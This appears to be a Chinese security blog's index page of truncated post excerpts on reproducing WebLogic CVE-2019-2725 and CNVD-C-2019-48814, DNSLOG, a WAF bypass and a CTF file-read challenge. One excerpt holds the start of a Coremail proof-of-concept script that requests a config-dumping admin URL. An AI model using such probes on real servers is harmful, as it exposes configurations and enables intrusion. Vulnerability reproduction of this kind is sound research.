CVE-2019-2725 绕过 复现

CVE-2019-2725 绕过 复现 系统版本 Centos7.5 JDK 版本:jdk1.6.0_45     :直接去官网下载 weblogic 版本:10.3.6      : 直接去官网下载 ...

coremail poc

import requests,sys def mailsmsPoC(url): url = url + "/mailsms/s?func=ADMIN:appState&dumpConfig=/" r = requests.get(url) if (r.status_code != '404') and ("/home/coremail...

CVE-2019-2725 复现

Docker 搭建环境 docker pull ismaleiva90/weblogic12 docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest http://localhost:49163/console User: weblogi...

DNS log 学习

DNSLOG的原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问 www.o2oxy.cn 时. 最后面访问的还是该域名的NS 服务器。阿里云的域名的NS 记录都是可以修改的。也就是说。如果我们本地建立一...

密码保护:某waf bypass 实践

某waf bypass 实践  不知何时想绕过某waf 然后搭建了一个测试环境 一个xss 环境和一个sql注入环境 分别存储xss 和反射xss   get 注入和post 注入 测...

CNVD-C-2019-48814 复现

CNVD-C-2019-48814 WebLogic wls9-async反序列化远程命令执行漏洞 Docker 搭建环境 docker pull ismaleiva90/weblogic12 docker run -d -p 49163:7001 -p 49164:7002...

记录一道web题目

 http://95d0deaf1ade4dada96134a916bce5e1ab4dfa4227fb4400.changame.ichunqiu.com/  php协议读取文件 读取到index.php <?php error_reporting(0); $file = $_GET["fi...